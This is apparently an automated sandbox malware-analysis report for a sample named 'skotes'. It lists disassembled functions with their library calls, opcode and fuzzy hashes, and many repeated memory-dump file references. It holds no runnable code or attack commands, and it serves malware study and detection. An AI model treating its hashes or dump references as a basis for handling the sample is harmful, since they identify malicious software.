API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 246774199-923244539
Opcode ID: 7cc5d586e4b753b76cc217082dcb01d58fc30b685d01af23648ca248c227f056
Instruction ID: 763eb757e4ff996d981289b1099fef77f8703c2477ed1359ed880407d840ec9f
Opcode Fuzzy Hash: 7cc5d586e4b753b76cc217082dcb01d58fc30b685d01af23648ca248c227f056
Instruction Fuzzy Hash: 03F0E975900208F7C725FA54EC86C9EB3799EC2714B208329E40657181DB7CAE45CBD2

Function 007BCBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 007BCC66

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
Instruction ID: 77ac5c4256ab6070df1f60937f3493894eb0182b6ea6c90476419967f83aec47
Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
Instruction Fuzzy Hash: D7B10532A04686DFDB16CF28C885BEEBFE5EF55350F14816AE855EB242D6389D01CB60

Function 007B504E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 007B5115
___AdjustPointer.LIBCMT ref: 007B5138
___AdjustPointer.LIBCMT ref: 007B51D4

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 8d9f4253df27dcc7e3754f71cfa8fec7f9096557ca208b49321eb3340ed59487
Instruction ID: 76a370d4a2c1aaf52d24ee0cd9239e49920ab3341e8981a813bd40dc3d4b28d2
Opcode Fuzzy Hash: 8d9f4253df27dcc7e3754f71cfa8fec7f9096557ca208b49321eb3340ed59487
Instruction Fuzzy Hash: 5B51E372601A0EEFDB299F18D845BFA73B5FF14310F248529E80197291E739ED41DB91

Function 007B4C15 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 007B4C66
TypeidsEqual.LIBVCRUNTIME ref: 007B4C8B
PMDtoOffset.LIBCMT ref: 007B4CA1
PMDtoOffset.LIBCMT ref: 007B4D22

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
Instruction ID: 001a3327260a06f388c80bb6d1f4e239849eec228e7e5a4ef41f65bf9a8a2084
Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
Instruction Fuzzy Hash: EE518A35B042099FDF11CF68C4807EEBBF5EF15354F14449AE950A7352D73AAA05CBA0

Function 007ADB30 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 007ADB64

Part of subcall function 007A8F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 007A8F50

Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 007ADBC3
Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 007ADBE9
Concurrency::location::_Assign.LIBCMT ref: 007ADC56

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
String ID:
API String ID: 1091748018-0
Opcode ID: 7dc4e568f699399dfca8afca311fb17e2e2b5be53ff809ed7c383f111348b16d
Instruction ID: 6b94eecce37b68f723548dc90bf205d968d3474a8d2e8fec5a9f6b4f9054b073
Opcode Fuzzy Hash: 7dc4e568f699399dfca8afca311fb17e2e2b5be53ff809ed7c383f111348b16d
Instruction Fuzzy Hash: 8241E770604214FFCF299B24C88ABBDBB75AF86720F044299E5075B7C2CB78AD45C7A1

Function 007A56AF Relevance: 6.1, APIs: 4, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

_InternalDeleteHelper.LIBCONCRT ref: 007A56F2
_InternalDeleteHelper.LIBCONCRT ref: 007A5726
Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 007A578B
SafeRWList.LIBCONCRT ref: 007A579A

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
String ID:
API String ID: 893951542-0
Opcode ID: 40a947a639dd21950f18c36af9fd71db89b039bb5cef41b65d7628ba82d8c2c5
Instruction ID: a4a3042846b3592fe09349d061296d7012b3f8750b5ac5f721cc7c0fd9144262
Opcode Fuzzy Hash: 40a947a639dd21950f18c36af9fd71db89b039bb5cef41b65d7628ba82d8c2c5
Instruction Fuzzy Hash: 4531E736701510DFCF199F60D889BAD77B6AFC9710F148279E90AAF295DB386C058790

Function 007A2CFC Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 007A2D0F

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
